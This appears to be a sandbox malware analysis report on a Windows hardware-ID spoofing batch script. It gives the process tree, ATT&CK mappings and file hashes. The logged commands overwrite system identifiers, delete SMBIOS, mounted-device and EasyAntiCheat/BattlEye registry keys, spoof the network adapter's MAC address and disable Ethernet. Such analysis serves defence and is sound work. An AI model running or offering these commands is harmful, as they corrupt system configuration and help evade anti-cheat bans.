  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2956
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3676
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3296
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1704
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3484
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5000
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2904
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3220
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5112
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 293627589-357428535-2502731715 /f
    3⤵
    - Modifies registry key
    PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2588
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 293627589-357428535-2502731715 /f
    3⤵
    PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3604
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    - Modifies registry key
    PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {293627589-357428535-2502731715} /f
    3⤵
    - Modifies registry key
    PID:712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:4792
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:4072
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:3224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:2940
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:3152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:2040
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:4376
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:3176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:2336
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    - Modifies registry key
    PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:1884
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:3692
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:4192
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:3948
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    PID:4592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:524
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:3836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:2028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:1500
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:3356
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:408
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:3720
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:1620
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v NetworkAddress /t REG_SZ /d C601DD284240 /f
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4016
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      PID:1204
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:3340
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:3856
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:4676
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v PnPCapabilities /t REG_DWORD /d 24 /f
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
    3⤵
    PID:3300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
      4⤵
      PID:1984
- - C:\Windows\system32\netsh.exe
    netsh interface set interface name="Ethernet" disable
    3⤵
    PID:2904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
PID:4784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\GameBarPresenceWriter\Mac.bat

Filesize
1KB

MD5
707c798832f76eb383a0501b2773ec32

SHA1
3ebd0413af9929109ea0eb0045a2d26a256e771f

SHA256
940f3e68e62ad73c0668e854d821d88eacc8ea8fb8e130e42a34368ae9f5852e

SHA512
13e92ef958cfcc5686a2886b4a011f2287ec261028db0c6816d738eb715490d69ca37f8232e7bb3bebd5d49ce65bf4b9f55ae12d4af056bf569e5a1dba2f3da9

Download Submit

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads